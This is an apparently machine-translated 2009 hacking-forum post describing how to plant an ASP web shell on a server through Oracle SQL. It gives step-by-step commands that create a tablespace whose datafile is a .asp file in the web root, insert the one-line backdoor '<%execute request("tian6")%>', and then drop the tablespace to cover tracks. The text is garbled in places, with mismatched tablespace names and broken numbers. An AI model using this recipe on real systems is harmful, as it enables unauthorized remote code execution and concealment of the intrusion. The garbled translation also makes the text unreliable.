[Follow_me series]oracle Shell-vulnerability warning-the black bar safety net

2009-08-04T00:00:00
ID MYHACK58:62200924146
Type myhack58
Reporter 佚名
Modified 2009-08-04T00:00:00

Description

The patch from Sun network technology Forum:<http://bbs.tian6.com/thread-14046-1-1.html>

Days male the starter, reproduced indicate the source of!

  1. SQL> create tablespace kjtest datafile 'e:\website\kj.asp'
  2. size 100k nologging ;

_ Copy the code _

This will create the Table space.

It should be noted that the oracle of the Table, The smallest unit is 100K.

The following began to build the table:

  1. SQL> CREATE TABLE WEBSHELL(C varchar2(1 0 0)) tablespace tian6;

_ Copy the code _

This table is built well.

The type of table generally is a VARCHAR because the table space is very small, so can not use CLOB or BLOB Type.

  1. SQL> insert into WEBSHELL values('<%execute request("tian6")%>');

_ Copy the code _

Write the data.

  1. SQL> commit;

_ Copy the code _

The submission is completed.

Submitted after the completion of the prompts OK? NO? If you point of NO words.... and

Because this time you of these editors are part of the offline edit, the need for synchronization to take effect, so click OK now, you say?

  1. SQL> alter tablespace tian6 offline;

_ Copy the code _

OK, to this step so far you've written into a WEBSHELL on.

Don't forget to wipe the PP

  1. SQL> drop tablespace tian6 including contents;

_ Copy the code _

All of the above steps must be established before you know the web path of the premise of Oh:)